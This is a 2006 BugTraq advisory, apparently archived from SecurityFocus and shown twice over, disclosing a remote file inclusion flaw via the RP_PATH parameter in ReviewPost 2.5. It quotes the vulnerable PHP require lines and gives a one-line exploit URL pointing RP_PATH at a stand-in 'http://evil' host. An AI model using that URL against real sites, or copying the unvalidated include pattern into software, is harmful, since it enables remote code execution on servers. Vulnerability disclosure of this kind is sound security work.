BugTraq
Back to list
|
Post reply
SolpotCrew Advisory #11 - ReviewPost 2.5 (RP_PATH) Remote File Inclusion
Sep 15 2006 05:01PM
bius mac com
#############################Solpot Crew Community##############################
#
# ReviewPost 2.5 (RP_PATH) Remote File Inclusion
#
# Donwload File : http://3-bius.com/ReviewPost.zip
#
########################################################################
#########
#
#
# Bug Found By :home_edition2001 a.k.a (bius) (15-09-2006)
#
# contact: bius (at) mac (dot) com [email concealed]
#
# Website : http://www.nyubicrew.org/adv/home_edition2001-adv-01.txt
#
########################################################################
########
#
#
# Greetz: Solpot,Matdule,Fungky,psycho_l061c,rm_2online,ax[I]xu,can4da_dry
# imam26_it,ant1casper(tolong tambahin ya)
# #nyubi , #hitamputih @dalnet
# and all member solpotcrew community
# http://www.nyubicrew.org/forum/
# especially thx to Solpot @ nyubi (at) dal (dot) net [email concealed]
#
########################################################################
#######
Input passed to the "RP_PATH" is not properly verified
before being used to include files. This can be exploited to execute
arbitrary PHP code by including files from local or external resources.
code from index.php
<?php
require "pp-inc.php";
if ( is_numeric($argv[0]) ) {
header("Location: {$Globals['maindir']}/showproduct.php?product={$argv[0]}");
exit;
}
require "$RP_PATH/languages/$rplang/index.php";
require "$RP_PATH/login-inc.php";
if ( file_exists("install.php") || file_exists("{$Globals['maindir']}/install.php") ) {
diewell( "For security reasons, please remove the install.php from the ReviewPost directory before proceeding." );
exit;
}
?>
nb : others file has vulnerable too :)
exploit : http://somehost/path_to_ReviewPost/index.php?RP_PATH=http://evil
########################################################################
#####
######################################E.O.F#############################
#####
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
#
# ReviewPost 2.5 (RP_PATH) Remote File Inclusion
#
# Donwload File : http://3-bius.com/ReviewPost.zip
#
########################################################################
#########
#
#
# Bug Found By :home_edition2001 a.k.a (bius) (15-09-2006)
#
# contact: bius (at) mac (dot) com [email concealed]
#
# Website : http://www.nyubicrew.org/adv/home_edition2001-adv-01.txt
#
########################################################################
########
#
#
# Greetz: Solpot,Matdule,Fungky,psycho_l061c,rm_2online,ax[I]xu,can4da_dry
# imam26_it,ant1casper(tolong tambahin ya)
# #nyubi , #hitamputih @dalnet
# and all member solpotcrew community
# http://www.nyubicrew.org/forum/
# especially thx to Solpot @ nyubi (at) dal (dot) net [email concealed]
#
########################################################################
#######
Input passed to the "RP_PATH" is not properly verified
before being used to include files. This can be exploited to execute
arbitrary PHP code by including files from local or external resources.
code from index.php
<?php
require "pp-inc.php";
if ( is_numeric($argv[0]) ) {
header("Location: {$Globals['maindir']}/showproduct.php?product={$argv[0]}");
exit;
}
require "$RP_PATH/languages/$rplang/index.php";
require "$RP_PATH/login-inc.php";
if ( file_exists("install.php") || file_exists("{$Globals['maindir']}/install.php") ) {
diewell( "For security reasons, please remove the install.php from the ReviewPost directory before proceeding." );
exit;
}
?>
nb : others file has vulnerable too :)
exploit : http://somehost/path_to_ReviewPost/index.php?RP_PATH=http://evil
########################################################################
#####
######################################E.O.F#############################
#####
[ reply ]